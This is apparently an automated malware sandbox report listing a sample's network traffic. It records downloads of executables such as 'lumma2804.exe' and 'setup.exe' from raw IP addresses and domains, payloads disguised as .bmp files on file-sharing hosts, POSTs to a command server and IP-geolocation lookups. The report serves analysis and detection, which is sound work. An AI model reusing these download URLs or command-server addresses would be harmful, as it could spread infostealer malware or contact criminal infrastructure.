Source: global traffic	HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sextipolar.sbsConnection: Keep-AliveCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: monoblocked.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: f.123654987.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b08GcZph4ge7Tw9b9Uj3c1wFnC01nFynmnNL&api=1&no_preview=1#ww11 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_669146636?hash=oOxNOsTOdJPrmnDMbC1WPJr0rvKjkZ1hobtPAeSmhS0&dl=r9dUuCDHeIUqlREMZideAXmDqLSX2CxI5qdKmkcx3po&api=1&no_preview=1#cap HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_668917518?hash=HcqSqB4BEz69zZduDzHpG5p3oDuUGmC4h5HdrueZTFD&dl=73Wmq1mPcIfGe320FelzdYt7foFKatzHUAXVPKOvEz0&api=1&no_preview=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909328/u5294803/docs/d50/141d7a9868fe/grwg_20240501083043.bmp?extra=LlcaPpnlc3Nm2YJa_HIxTuy8pxFR3cOfTp20BZVPqWbia3-pjLZINmv48VErXBJArrURXJc9wcRab86W2hl73jhKe_zRspSlR2tyoxWE2filhre49hjiCvIckuUXGOOQUBkTv6pEvBQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_669132669?hash=ZKjz6ih7UQ9lzkD21VhcvrQwcwdE4E0ZYGiugVcv47k&dl=WempMPmw6ufkYnUzfTIoLDfW8XiZgAu8J2F0VsJ9NwT&api=1&no_preview=1#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_669123201?hash=XDCpjElzxewo4KzTOHuQEMVCKwzlHqQzBJyb5YKd2Jc&dl=cOyLY32AZWRaWIUaV6LVF1KVnbsjSHxC1w6esY9lvXc&api=1&no_preview=1#mene HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c237031/u5294803/docs/d48/faa96ddc856f/BotClient_make.bmp?extra=-QkfenqPxrvYtmrTIqBQ0mVeqEu8ubnNU1NG8tGGtw3-QFsDYjvYp64yJnpB_OcMg0uhKlG1RASme310Qax8_egiLSt12hVPF9Wl3DN6qYLOxmECHbAL6mz2NgJ9qEZNdnWZ6unUcjI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_669074803?hash=gtxjyDdukAIKxlWY09AIJPG5gj5TRTjhoVyhzgbP72o&dl=A9s6LaMpuQCyacGXT0hxzf0MvaBJbV8eIlyefAe3TSw&api=1&no_preview=1#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909218/u5294803/docs/d8/57e1b3af3092/crypted.bmp?extra=Gxkm1-qUj4gTylzhygF0ymDxXHL811_5cKi0pGRSmNbB8xbMKVlvz1Dj_tciMVuEusahBVGi1kGq7gOCAviXVpJzhtwg5lCSO-f5sXIwePQ4Q0UjpInqDSzvgoI_tCv82d6g6aUD97c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-22.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /c236331/u5294803/docs/d47/5d64691d2964/crypted.bmp?extra=kGc4Kw6r3KNmnJcNsZNoeqzxsyU48VGtKMsa8v9e4LEHURc7u4wFMmsoHQSLycKdnKbLmB8U76u1qw4WomWhiyKAlTZiZ2p3djsH9911hBclkSW3TQfktfGI1iuTmpkRbaERsG2JfXY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c237231/u5294803/docs/d14/fab319a9eaa9/file.bmp?extra=XekPvLwajf3zjaY5buJAe3HnfkyeicpSttiDxaJzdLoB5YHmFFoUME6QuSgS26MeSPNwYYaTqVwUYy3Yw-9Wvle-70JE1-Pdb5-fcQuxBseFU0qmjloWPkyYmuqT-KQGgal4YgoTpuk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1aFYp7.mp3 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /1pRXr7.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1BV4j7.mp4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /api/bing_release.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 113Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 133Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: HEAD /download/th/retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /padla/fiona.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /dl.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: sextipolar.sbsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dl.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /download/th/getimage12.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /padla/fiona.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: sextipolar.sbsCache-Control: no-cacheCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic	HTTP traffic detected: HEAD /upd/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: pofix.redCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/getimage12.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /upd/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: pofix.redCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 261Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 645Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: HEAD /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_0041E220 recv,setsockopt,recv,WSAGetLastError,recv,recv,setsockopt,recv,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,Sleep,

7_2_0041E220

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: zanzibarpivo.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: triedchicken.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /style/060.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: dod.fastbutters.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cheremushki.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: carthewasher.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sextipolar.sbsConnection: Keep-AliveCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: monoblocked.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: f.123654987.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b08GcZph4ge7Tw9b9Uj3c1wFnC01nFynmnNL&api=1&no_preview=1#ww11 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_669146636?hash=oOxNOsTOdJPrmnDMbC1WPJr0rvKjkZ1hobtPAeSmhS0&dl=r9dUuCDHeIUqlREMZideAXmDqLSX2CxI5qdKmkcx3po&api=1&no_preview=1#cap HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_668917518?hash=HcqSqB4BEz69zZduDzHpG5p3oDuUGmC4h5HdrueZTFD&dl=73Wmq1mPcIfGe320FelzdYt7foFKatzHUAXVPKOvEz0&api=1&no_preview=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909328/u5294803/docs/d50/141d7a9868fe/grwg_20240501083043.bmp?extra=LlcaPpnlc3Nm2YJa_HIxTuy8pxFR3cOfTp20BZVPqWbia3-pjLZINmv48VErXBJArrURXJc9wcRab86W2hl73jhKe_zRspSlR2tyoxWE2filhre49hjiCvIckuUXGOOQUBkTv6pEvBQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
